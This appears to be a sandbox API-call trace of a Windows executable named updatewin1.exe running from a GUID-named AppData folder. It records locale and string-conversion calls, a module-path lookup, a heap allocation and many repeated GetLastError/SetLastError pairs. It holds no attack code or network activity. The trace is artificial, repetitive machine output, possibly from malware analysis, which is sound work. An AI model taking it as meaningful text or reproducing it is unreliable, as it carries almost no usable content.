\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鳌㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0128.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鳌㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0128.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ!«\x08\x9b\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0128.876] GetLastError () returned 0x0 [0128.876] SetLastError (dwErrCode=0x0) [0128.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0128.877] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鳌㞕AĀ") returned 256 [0128.877] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鳌㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0128.877] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鳌㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0128.877] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ!«\x08\x9b\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0128.877] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe")) returned 0x5f [0128.877] GetLastError () returned 0x0 [0128.877] SetLastError (dwErrCode=0x0) [0128.877] GetLastError () returned 0x0 [0128.877] SetLastError (dwErrCode=0x0) [0128.877] GetLastError () returned 0x0 [0128.877] SetLastError (dwErrCode=0x0) [0128.877] GetLastError () returned 0x0 [0128.877] SetLastError (dwErrCode=0x0) [0128.877] GetLastError () returned 0x0 [0128.877] SetLastError (dwErrCode=0x0) [0128.877] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.878] SetLastError (dwErrCode=0x0) [0128.878] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.879] SetLastError (dwErrCode=0x0) [0128.879] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.880] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.880] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.880] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.880] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.880] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.880] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.880] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.880] GetLastError () returned 0x0 [0128.880] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.881] SetLastError (dwErrCode=0x0) [0128.881] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.882] SetLastError (dwErrCode=0x0) [0128.882] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.883] SetLastError (dwErrCode=0x0) [0128.883] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.884] SetLastError (dwErrCode=0x0) [0128.884] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.885] SetLastError (dwErrCode=0x0) [0128.885] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.886] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.886] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.886] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.886] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.886] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.886] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.886] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.886] GetLastError () returned 0x0 [0128.886] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.887] SetLastError (dwErrCode=0x0) [0128.887] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.888] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x68) returned 0x3e1990 [0128.888] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.888] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.888] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.888] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.888] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.888] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.888] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.888] GetLastError () returned 0x0 [0128.888] SetLastError (dwErrCode=0x0) [0128.889] GetLastError () returned 0x0 [0128.889] SetLastError (dwErrCode=0x0) [0128.889] GetLastError () returned 0x0 [0128.889] SetLastError (dwErrCode=0x0) [0128.889] GetLastError () returned 0x0 [0128.889] SetLastError (dwErrCode=0x0) [0128.889] GetLastError () returned 0x0 [0128.889] SetLastError (dwErrCode=0x0) [0128.889] GetLastError () returned 0x0 [0128.889] SetLastError (dwErrCode=0x0) [0128.889] GetLastError () returned 0x0 [0128.889] SetLastError (dwErrCode=0x0) [0128.889] GetLastError () returned 0x0 [0128.889] SetLastError (dwErrCode=0x0) [0128.889] GetLastError () returned 0x0 [0128.891] SetLastError (dwErrCode=0x0) [0128.891] GetLastError () returned 0x0 [0128.891] SetLastError (dwErrCode=0x0) [0128.891] GetLastError () returned 0x0 [0128.891] SetLastError (dwErrCode=0x0) [0128.891] GetLastError () returned 0x0 [0128.891] SetLastError (dwErrCode=0x0) [0128.891] GetLastError () returned 0x0 [0128.891] SetLastError (dwErrCode=0x0) [0128.891] GetLastError () returned 0x0 [0128.891] SetLastError (dwErrCode=0x0) [0128.891] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.892] SetLastError (dwErrCode=0x0) [0128.892] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.893] SetLastError (dwErrCode=0x0) [0128.893] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.894] SetLastError (dwErrCode=0x0) [0128.894] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.895] GetLastError () returned 0x0 [0128.895] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.896] GetLastError () returned 0x0 [0128.896] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.897] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.897] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.897] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.897] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.897] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.897] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.897] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.897] SetLastError (dwErrCode=0x0) [0128.897] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.898] SetLastError (dwErrCode=0x0) [0128.898] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.899] SetLastError (dwErrCode=0x0) [0128.899] GetLastError () returned 0x0 [0128.900] SetLastError (dwErrCode=0x0) [0128.900] GetLastError () returned 0x0 [0128.900] SetLastError (dwErrCode=0x0) 